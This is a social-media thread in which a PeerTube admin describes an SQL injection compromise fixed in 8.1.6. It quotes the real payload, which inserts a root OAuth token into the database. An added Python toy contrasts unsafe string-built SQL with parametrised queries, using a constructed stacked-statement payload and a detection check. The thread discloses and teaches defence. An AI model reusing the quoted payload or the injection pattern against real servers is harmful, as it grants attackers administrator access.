Today's fun adventure with #peertube involves the #exploit fixed in 8.1.6.
-
Today's fun adventure with #peertube involves the #exploit fixed in 8.1.6. This one has an SQL injection hole. Looks like they got into mine, but apparently nothing was done to it yet. If you're curious, here's what the exploit pushed in the actor table:
Xhttp://20.240.202.159:8777/x');DO//$f$//DECLARE//uid//INT;//cid//INT;//BEGIN//EXECUTE//'SELECT//id//FROM//'||quote_ident('user')||'//WHERE//role=0//LIMIT//1'//INTO//uid;//EXECUTE//'SELECT//id//FROM//'||quote_ident('oAuthClient')||'//LIMIT//1'//INTO//cid;//EXECUTE//'INSERT//INTO//'||quote_ident('oAuthToken')||'('||quote_ident('accessToken')||','||quote_ident('refreshToken')||','||quote_ident('accessTokenExpiresAt')||','||quote_ident('refreshTokenExpiresAt')||','||quote_ident('userId')||','||quote_ident('oAuthClientId')||','||quote_ident('createdAt')||','||quote_ident('updatedAt')||')//VALUES('||quote_literal('pt_audit_3e8b97f2a914')||','||quote_literal('refresh_pt_audit_3e8b97f2a914')||','||quote_literal('2030-01-01')||','||quote_literal('2030-01-01')||','||uid||','||cid||',NOW(),NOW())';//END//$f$;--
So this worked because they had a ' after the URL. #infosec
-
Apparently this was contained; the aforementioned exploit to push the root auth tokens was the only thing. Apparently exploited instances get a plugin called peertube-plugin-google-analytics-js added to do something more or less funny; mine had nothing extra on it for now. Naturally all the passwords are now changed and everyone kicked out.
The 8.1.8 release adds a feature to limit root user's usefulness in an attack like this.
-
@apz It’s not like RDBMS didn’t have parametrised queries since, like, the dawn of time

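Added example, not code from this thread, from PeerTube or from its maintainers: a toy that shows the two ways of getting a remote actor's URL into a table, the string-pasting one that the payload above abuses and the parametrised one. Assumptions: it uses Python's standard-library sqlite3 in place of PostgreSQL, invents a two-table schema (`actor`, `oauth_token`) that is not PeerTube's real one, uses `executescript()` on the unsafe path to mimic a server that accepts stacked statements in one request, and feeds it a constructed payload shaped like the real one (URL, closing quote and paren, a stacked statement, a `--` comment) that only inserts a marker row into the toy token table. The last function is the defender's check: a URL column should never contain a quote, a semicolon or a comment marker.

```python
import sqlite3

# Constructed payload, shaped like the one in the thread: a URL, a closing
# quote+paren, a stacked statement, then a comment to swallow the rest.
# Toy only: it inserts a marker row into a toy oauth_token table.
ATTACK_URL = (
    "http://attacker.invalid/x'); "
    "INSERT INTO oauth_token (access_token, user_id) VALUES ('injected', 1); --"
)
BENIGN_URL = "https://peertube.example.invalid/accounts/alice"


def make_db():
    """Fresh in-memory SQLite database with two toy tables (constructed
    schema, not PeerTube's real one)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE actor (id INTEGER PRIMARY KEY, url TEXT NOT NULL);
        CREATE TABLE oauth_token (id INTEGER PRIMARY KEY,
                                  access_token TEXT NOT NULL,
                                  user_id INTEGER NOT NULL);
        """
    )
    return conn


def build_query_unsafe(url):
    """The bug: the remote actor's URL is pasted straight into the SQL text,
    so a quote in the URL ends the literal and the rest is parsed as SQL."""
    return f"INSERT INTO actor (url) VALUES ('{url}');"


def insert_actor_unsafe(conn, url):
    # executescript() stands in for a server/driver that accepts several
    # statements in one request (PostgreSQL's simple-query path does).
    conn.executescript(build_query_unsafe(url))


def insert_actor_safe(conn, url):
    """The fix: the URL travels as a bound parameter. The database never
    parses it as SQL, whatever characters it contains."""
    conn.execute("INSERT INTO actor (url) VALUES (?)", (url,))
    conn.commit()


def token_count(conn):
    return conn.execute("SELECT COUNT(*) FROM oauth_token").fetchone()[0]


def stored_actor_urls(conn):
    return [row[0] for row in conn.execute("SELECT url FROM actor ORDER BY id")]


def suspicious_actor_urls(conn):
    """Defender's check on an existing database: URLs holding a quote, a
    statement separator or a SQL comment marker deserve a look."""
    return [u for u in stored_actor_urls(conn)
            if any(mark in u for mark in ("'", ";", "--", "$$"))]


def demo():
    """Run both paths against fresh databases and report what got stored."""
    unsafe = make_db()
    insert_actor_unsafe(unsafe, BENIGN_URL)
    insert_actor_unsafe(unsafe, ATTACK_URL)

    safe = make_db()
    insert_actor_safe(safe, BENIGN_URL)
    insert_actor_safe(safe, ATTACK_URL)

    return {
        "unsafe_tokens": token_count(unsafe),     # the stacked INSERT ran
        "unsafe_urls": stored_actor_urls(unsafe),  # payload was truncated at the quote
        "safe_tokens": token_count(safe),         # nothing extra ran
        "safe_urls": stored_actor_urls(safe),      # payload stored as an inert string
        "safe_flagged": suspicious_actor_urls(safe),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On the unsafe path the token table gains a row and the actor table keeps only the part of the URL before the quote; on the parametrised path the whole payload is stored as a plain string, no token is created, and the check flags that stored string for review, which is roughly how the row in the thread above was noticed.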
-
@ghard I think the battle of trying to explain the concept to new developers is already lost. I've explained the problem to a couple of project owners and people just don't seem to take it seriously. It's not like it's one of the most basic exploits ever on the web.
-
@apz sigh yeah.
I spent a few decades in the industry actually implementing relational database engines, and being at clients' premises with their "expert developers" and seeing them draw a blank when mentioning SQLPrepareStmt or similar...
I don't even want to go there anymore. Now with the AI deskilling I'm expecting things to become even worse.
Glad I dropped out and got to doing something more meaningful.
-
@apz LOL very timely, just on that note, say hello to CVE-2026-9082
Not that I would trust Drupal or any other modern or ancient CMS any longer than I could throw it.
-
@ghard Back like in the early 00s I made my own. Very ghetto, but does everything I want it to do.
"Spaghetti code!" they said.
"It's not modern!"
Well, the patching day for it isn't every day.
-
Looking at my Peertube instance's logs, there are A LOT of old versions out there. I think a lot of instances seem to be install-and-forget when it comes to maintenance.